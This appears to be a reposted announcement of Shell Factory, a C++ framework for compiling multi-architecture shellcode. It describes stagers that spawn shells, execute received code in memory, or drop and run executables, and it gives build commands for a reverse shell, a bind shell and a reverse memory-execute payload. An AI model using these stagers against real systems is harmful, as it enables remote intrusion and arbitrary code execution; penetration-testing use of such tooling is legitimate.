Shellcode Builder: Shell Factory

Shellcode Builder: Shell Factory

Shell Factory is a framework for compiling shellcodes from a C++ source for multiple systems and architectures.

It is composed of multiple parts:

  • a Rakefile for compiling and linking against different compilers and architectures.
  • the factory, a set of C++ headers to generate system calls for different systems and architectures.
  • picolib, a generic C++ library relying on the system call factory to abstract interactions the target system.

The shellcode is compiled as a single compilation unit with common optimizations to reduce its code size.

The resulting file is supposed to be a single binary blob executable from anywhere in memory, starting at offset 0.








Basic usage

Put your shellcode source file in the shellcodes directory, then compile it with rake <shellcode>.

For example, create a template file named shellcodes/ :

#include <factory.h>
#include <pico.h>

using namespace Pico;


Then compile it with: rake template. On a Linux amd64 system, this will generate the files bins/template.elf and bins/template.x86_64-linux.bin.

$ objdump -d bins/template.elf

00000000004000b0 <_start>:
  4000b0:       31 ff                   xor    %edi,%edi
  4000b2:       b8 e7 00 00 00          mov    $0xe7,%eax
  4000b7:       0f 05                   syscall


Default shellcodes

Three generic stager shellcodes are provided in the shellcodes directory:

  • shellexec : runs a standard /bin/sh shell or any specified command.
  • memexec : allocates executable memory, receives data and executes it.
  • dropexec : reads data, drops an executable file on the system and executes it.



Channels are an abstraction layer that allows to use different kind of data streams configurable through compilation variables: files, sockets, opened file descriptors.

They are typically used by shellexec, memexec and dropexec to receive and send data. The default channels used are the standard input/output when none are specified.



Reverse shell on the local network
rake shellexec CHANNEL=TCP_CONNECT HOST= PORT=2222


Bind-shell TCPv6
rake shellexec CHANNEL=TCP6_LISTEN HOST=::1 PORT=1111


Reverse memory execute over SCTPv6
rake memexec CHANNEL=SCTP6_CONNECT HOST=fe80::800:27ff:fe00:0 PORT=3333


Supported targets

x86 amd64 ARM Aarch64 PowerPC SH4 MIPS

Items marked as ∼ are a work in progress and are not fully implemented yet.


Shellcode Builder: Shell Factory Download

Source: CyberPunk @ February 27, 2017 at 10:37AM